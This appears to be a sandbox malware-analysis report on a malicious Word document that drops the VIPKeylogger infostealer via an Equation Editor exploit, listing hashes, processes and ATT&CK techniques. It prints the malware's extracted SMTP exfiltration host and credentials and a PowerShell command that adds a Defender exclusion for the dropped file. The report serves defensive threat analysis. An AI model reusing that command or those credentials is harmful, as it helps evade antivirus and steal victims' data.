Analysis
-
max time kernel
120s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21/08/2024, 07:16
Static task
static1
Behavioral task
behavioral1
Sample
ORDER CFC.docx
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ORDER CFC.docx
Resource
win10v2004-20240802-en
General
-
Target
ORDER CFC.docx
-
Size
179KB
-
MD5
413ed50fc5b7fc796c710bb1b0f02cc4
-
SHA1
440c50be71fbe20648115bcd65b04a75940a833a
-
SHA256
dcdd3c117ec0dc6af052496d1cc0d24da9b264f566e0e763380af879dfbcdf27
-
SHA512
c47893f5b8cca2015ff4803d14dc8f04d857ee0478d62be8dd61f00d0e363de1c1c05b16cde5afe9d0ed0a2df58fada5deda7b728f65f2b20764df430f787d99
-
SSDEEP
3072:AiY5rj1ATug+mhTZMxjcFQ9csn4qAzYjDp/shKuikycBSRjR/Vx7XUo4Zj:a5r/g+qZMpcFSQzYHut4dNAj
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.mangroveservices.net - Port:
587 - Username:
[email protected] - Password:
?hMoSL*2jz - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 2176 EQNEDT32.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 528 powershell.exe -
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE 2 IoCs
pid Process 1108 erdalpha03977.exe 1984 erdalpha03977.exe -
Loads dropped DLL 1 IoCs
pid Process 2176 EQNEDT32.EXE -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 erdalpha03977.exe Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 erdalpha03977.exe Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 erdalpha03977.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1108 set thread context of 1984 1108 erdalpha03977.exe 37 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language erdalpha03977.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language erdalpha03977.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2176 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2700 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1984 erdalpha03977.exe 528 powershell.exe 1984 erdalpha03977.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1984 erdalpha03977.exe Token: SeDebugPrivilege 528 powershell.exe Token: SeShutdownPrivilege 2700 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2700 WINWORD.EXE 2700 WINWORD.EXE -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2176 wrote to memory of 1108 2176 EQNEDT32.EXE 32 PID 2176 wrote to memory of 1108 2176 EQNEDT32.EXE 32 PID 2176 wrote to memory of 1108 2176 EQNEDT32.EXE 32 PID 2176 wrote to memory of 1108 2176 EQNEDT32.EXE 32 PID 2700 wrote to memory of 2352 2700 WINWORD.EXE 35 PID 2700 wrote to memory of 2352 2700 WINWORD.EXE 35 PID 2700 wrote to memory of 2352 2700 WINWORD.EXE 35 PID 2700 wrote to memory of 2352 2700 WINWORD.EXE 35 PID 1108 wrote to memory of 528 1108 erdalpha03977.exe 36 PID 1108 wrote to memory of 528 1108 erdalpha03977.exe 36 PID 1108 wrote to memory of 528 1108 erdalpha03977.exe 36 PID 1108 wrote to memory of 528 1108 erdalpha03977.exe 36 PID 1108 wrote to memory of 1984 1108 erdalpha03977.exe 37 PID 1108 wrote to memory of 1984 1108 erdalpha03977.exe 37 PID 1108 wrote to memory of 1984 1108 erdalpha03977.exe 37 PID 1108 wrote to memory of 1984 1108 erdalpha03977.exe 37 PID 1108 wrote to memory of 1984 1108 erdalpha03977.exe 37 PID 1108 wrote to memory of 1984 1108 erdalpha03977.exe 37 PID 1108 wrote to memory of 1984 1108 erdalpha03977.exe 37 PID 1108 wrote to memory of 1984 1108 erdalpha03977.exe 37 PID 1108 wrote to memory of 1984 1108 erdalpha03977.exe 37 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 erdalpha03977.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 erdalpha03977.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER CFC.docx"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2352
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1984
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Exploitation for Client Execution
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{1801A583-5FA4-43A0-9846-ED567702CEF2}.FSD
Filesize128KB
MD51fcf6ba39d294835197b61f89985cc19
SHA18bab32a1f09d4cacddf858bc5e935a76db5773e1
SHA2565461b8f01c5d92d7fb36300dfe2e34de89f43f935649b08b168de874a502fcbd
SHA512f305f3c4032d206ff4c7a5a546e03edf1a7659b6462cd5ae71d02f117f943d3c4e34a6e022bbe04e6925229dd11ef7181f4c89bfdbb46e8a4d9f905ad45d18ac
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize128KB
MD5db1a4477e0b4f604320eca76485dd8a4
SHA12099758d2ca0ca60b98d473ac8484d9b65cc83fd
SHA25679270048b8d5e61b20a5f55f49aa5662ba98f25fbad25259c01d7bfb7437468e
SHA512ef6d6e14ae50327875c177830616cb1bc4aa83e6fb8ff6dedc1bbbe5ba7d7fc58de9c75f13f845cb44a53e5cf271b6c846e0db51346c9e892bdde46d0054043a
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4FE33FBD-CE63-4C22-998F-B1175D2E54D0}.FSD
Filesize128KB
MD5e2fa37573389e12121abf95dcf30e0dc
SHA1a00dd848288776e6afa8280cbdbf6b26948013b4
SHA256a568bfa45a225fa4c1a706390bbd076ddbbb94fcc5bdb5a7a1d10515ba43ba7b
SHA512ff124271f67ccd683d618dbea70b8895f798a69838bf792bed34f8a13670b4e84771ddc93ca5ea4e400aa4d8eb0aef23152a9de72677bc027c260bb3a0a716fa
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\lOpkseAloegPhxxAcv[1].doc
Filesize820KB
MD577d04e68c46c843c399d83b858b9b46a
SHA18f4f41f26cd7bd6b60045cc878c83d132f79193a
SHA256d718eb322dc9348cb1813a920ca739a5c4bd6b44ac32c0c085bd92148bf94161
SHA51222986daa2bd352305885276d9c000caf89c171a6187caadb1d29bbbf1e89916e4a6a199aa6500890befaa9dfc92a14d87976b470b41ec49f5f050b40f9b8b81d
-
Filesize
128KB
MD51efc6f87b9d9905a7473cf88a5fa8b78
SHA122b3a7bfa6a21edeec1d09d3f612890c9b4c8b6a
SHA256ac45f6eb2f26592f06156611612283910a5112e329f5b927a02545dd6d33e82b
SHA5121485cb5d606d2be5332689dc7958f610b96dde1cb74561e01d2fe15ef8ccb30dbcedb66e9602777ced0a98c3a471a5cec4fa1029baf89cfc0acceea0f15406bf
-
Filesize
128KB
MD56e8804585732974ade9bf90548f5bcec
SHA1ccaa7a6d00b2b1c8ae90ec14c7e5cf2b4c74149e
SHA25678e957f012dd9e284cd40e0cdeeb6057b3303500a6ba0ae333e6754b02d7bbcd
SHA512743b8c906371927b0f0a991ed91c098fcbe66c60a7fe139f622e17f95f9b6098dbdc37fab2e80b5ed85e38a5beec2b577364271ab1a8ea991ed3aad93ab36696
-
Filesize
19KB
MD51b78260741a4818a9970e77e2187f33f
SHA15f6771cdfb33a9860e3032bb8038415c75600711
SHA25699e6b00b7416bb9e83f48f19b9fed2ee1d46a8f3d538eb953cd900809549bf5f
SHA5127ee24529e6b84473c929bf902f0e8cacb54f0c80bc55aa4125827351e8c0b90d7319b16c5351c26ffdec46fa8ebe49e27762f8a910187cba5c30b6c23f7412b4
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
720KB
MD58457be7f4b6910dc68805dacb8009200
SHA1a25c63862fe75623c6e69659ee7ae803ec8659b9
SHA256496ba3f23ddaf5c1514228f1ca90b1de4392a159eaac3ecbd5fbe3fbb28f819f
SHA5126ec632c69a19e1d36371aff5664f3c7c266bfab2fa2b321c3db2bb2e47c42fc9f0c60ebb71b7d3087d54b270368efee0a869888a325aa3d3c8af482f16b482b0